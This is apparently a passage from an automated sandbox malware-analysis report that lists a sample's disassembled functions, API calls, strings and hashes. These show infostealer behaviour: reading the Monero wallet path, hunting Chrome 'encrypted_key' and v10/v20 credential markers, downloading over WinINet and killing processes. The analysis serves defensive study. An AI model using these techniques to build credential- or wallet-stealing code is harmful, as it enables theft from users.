                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                    • API String ID: 3225020163-4244082812
                                    • Opcode ID: 424ef43a6e1b05af760998d466b218767f8bbc043b25834ca40b564d1c9e5e5a
                                    • Instruction ID: e48cdfa1ae9e04553b08391f51e8573c6b7d50ef5e1715b4d8e3751043671457
                                    • Opcode Fuzzy Hash: 424ef43a6e1b05af760998d466b218767f8bbc043b25834ca40b564d1c9e5e5a
                                    • Instruction Fuzzy Hash: 1AF0F975A41308BFE7109BA0AC4DEEA7B7CEB04716F100156BB05A6290EAB05E4487A0
                                    Function 000A9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memcmp.MSVCRT(?,v20,00000003), ref: 000A9E04
                                    • memcmp.MSVCRT(?,v10,00000003), ref: 000A9E42
                                    • LocalAlloc.KERNEL32(00000040), ref: 000A9EA7
                                      • Part of subcall function 000C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 000C71FE
                                    • lstrcpy.KERNEL32(00000000,000D4C48), ref: 000A9FB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpymemcmp$AllocLocal
                                    • String ID: @$v10$v20
                                    • API String ID: 102826412-278772428
                                    • Opcode ID: 25a129ab0ac698019f50b303ce63be91d6b0892bb8113e21a8ee6112cfc00f0b
                                    • Instruction ID: 975ba6e4537e214182c15e91c31e367b056e976f60caa5d4921e764651f2bbaf
                                    • Opcode Fuzzy Hash: 25a129ab0ac698019f50b303ce63be91d6b0892bb8113e21a8ee6112cfc00f0b
                                    • Instruction Fuzzy Hash: B9518B31B10209AFDB20EFA8DC85BDE77A8AF52314F154039F949EB252DB70ED458B90
                                    Function 000A5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000A565A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A5661
                                    • InternetOpenA.WININET(000CCFEC,00000000,00000000,00000000,00000000), ref: 000A5677
                                    • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 000A5692
                                    • InternetReadFile.WININET(?,?,00000400,00000001), ref: 000A56BC
                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 000A56E1
                                    • InternetCloseHandle.WININET(?), ref: 000A56FA
                                    • InternetCloseHandle.WININET(00000000), ref: 000A5701
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                    • String ID:
                                    • API String ID: 1008454911-0
                                    • Opcode ID: 1b8fcff89db16281f90a3f27f1fe28db6162c4fdd17a4fcb3c023f58dc379877
                                    • Instruction ID: 8d0b2e932e61a0f43f574ab50ca76b740c5b3d5f11ef424c9652aedbdd24dfc5
                                    • Opcode Fuzzy Hash: 1b8fcff89db16281f90a3f27f1fe28db6162c4fdd17a4fcb3c023f58dc379877
                                    • Instruction Fuzzy Hash: 5C414C71E01605AFDB14CF94ED88FAAB7F5FF49301F14806AE908AB291D7719D81CB94
                                    Function 000C4740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 000C4759
                                    • Process32First.KERNEL32(00000000,00000128), ref: 000C4769
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C477B
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000C479C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 000C47AB
                                    • CloseHandle.KERNEL32(00000000), ref: 000C47B2
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C47C0
                                    • CloseHandle.KERNEL32(00000000), ref: 000C47CB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: 331caedd783a48ace4f34e174502edddc5206bc587b2e902f9cb943fe6d85f79
                                    • Instruction ID: 7dfbde2a4c7302500ff4788fd2d1405b629d6bb15b946d5b777a5986c3c0020a
                                    • Opcode Fuzzy Hash: 331caedd783a48ace4f34e174502edddc5206bc587b2e902f9cb943fe6d85f79
                                    • Instruction Fuzzy Hash: 7501B571A06214AFE7605B64BC8DFEE77BCFB08752F040286F905D1080EF748D808A60
                                    Function 000BE500 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 150stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BE544
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE573
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE581
                                    • lstrcat.KERNEL32(?,00E6D128), ref: 000BE59C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID: P$h
                                    • API String ID: 818526691-864219856
                                    • Opcode ID: 9a5ef00919785796086377a8553dbffce2d6936f5fa02d3a190adfa309b3c4c2
                                    • Instruction ID: a42f257733cea8eb042d19498f2e6d435fc992c7ff180b2e03c93f90c582ea89
                                    • Opcode Fuzzy Hash: 9a5ef00919785796086377a8553dbffce2d6936f5fa02d3a190adfa309b3c4c2
                                    • Instruction Fuzzy Hash: 0951CB75E10108AFD754EB64EC56EEE33BDEB58300F04046EFA1697252EE70AE408B91
                                    Function 000B83E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 000B8435
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B846C
                                    • lstrlen.KERNEL32(00000000), ref: 000B84B2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B84E9
                                    • lstrlen.KERNEL32(00000000), ref: 000B84FF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B852E
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000B853E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 566657378cebb55f46aae6517dbd5c7d7450f6d23b5d38adf13a78759b76c1ac
                                    • Instruction ID: f88445e2886483102723781da15ed6da910d46fff8ef8e9eba3e576a74ad952c
                                    • Opcode Fuzzy Hash: 566657378cebb55f46aae6517dbd5c7d7450f6d23b5d38adf13a78759b76c1ac
                                    • Instruction Fuzzy Hash: 27516D719006029FCB64DF68D888A9BB7F9EF55700F14C469EC86DB265EB30ED41CB50
                                    Function 000C2910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 000C2925
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C292C
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E5B8C0,00000000,00020119,000C28A9), ref: 000C294B
                                    • RegQueryValueExA.ADVAPI32(000C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 000C2965
                                    • RegCloseKey.ADVAPI32(000C28A9), ref: 000C296F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: cd1d5216a7d82c0757fed50591c7a9420bccf234605324c1217c153999662874
                                    • Instruction ID: 767c739cd27884cfdf5b72e56b74bc42eb33f6397dfb958d189735824c244163
                                    • Opcode Fuzzy Hash: cd1d5216a7d82c0757fed50591c7a9420bccf234605324c1217c153999662874
                                    • Instruction Fuzzy Hash: 7E01BC75A01318AFD310DBA4AC5DFAB7BBCEB49716F10009AFE45DB280EA315D448BA0
                                    Function 000C2880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 000C2895
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C289C
                                      • Part of subcall function 000C2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 000C2925
                                      • Part of subcall function 000C2910: RtlAllocateHeap.NTDLL(00000000), ref: 000C292C
                                      • Part of subcall function 000C2910: RegOpenKeyExA.ADVAPI32(80000002,00E5B8C0,00000000,00020119,000C28A9), ref: 000C294B
                                      • Part of subcall function 000C2910: RegQueryValueExA.ADVAPI32(000C28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 000C2965
                                      • Part of subcall function 000C2910: RegCloseKey.ADVAPI32(000C28A9), ref: 000C296F
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E5B8C0,00000000,00020119,000B9500), ref: 000C28D1
                                    • RegQueryValueExA.ADVAPI32(000B9500,00E6DCF0,00000000,00000000,00000000,000000FF), ref: 000C28EC
                                    • RegCloseKey.ADVAPI32(000B9500), ref: 000C28F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: a989b32303af5418ca54ee80f88deb6f40bf62942fc868d93c2ed0174a72c880
                                    • Instruction ID: 045bfd8276d012e0ce7708d7a4d731240811e0395fd670000c77a3a453217fcf
                                    • Opcode Fuzzy Hash: a989b32303af5418ca54ee80f88deb6f40bf62942fc868d93c2ed0174a72c880
                                    • Instruction Fuzzy Hash: FE01AD71A02208BFDB10ABA4FC4DFAE7B7DEB44316F00015AFE08D2290EA709D4487A0
                                    Function 000A71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 000A723E
                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 000A7279
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A7280
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 000A72C3
                                    • HeapFree.KERNEL32(00000000), ref: 000A72CA
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 000A7329
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                    • String ID:
                                    • API String ID: 174687898-0
                                    • Opcode ID: 2c6c8085a31262f4eb13523397d89c5e464737ba930fd7f8e6eba1c9940d314a
                                    • Instruction ID: c1625c38c91a9f4b4fff1f556718b4a0d704fc22bc657fc4f3c523b3be9e2ceb
                                    • Opcode Fuzzy Hash: 2c6c8085a31262f4eb13523397d89c5e464737ba930fd7f8e6eba1c9940d314a
                                    • Instruction Fuzzy Hash: DE415D72B056069BDB60CFA9EC84BAAB3E8FB85305F14856AEC4DC7340E631ED409B50
                                    Function 000A9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 000A9CA8
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000A9CDA
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000A9D03
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
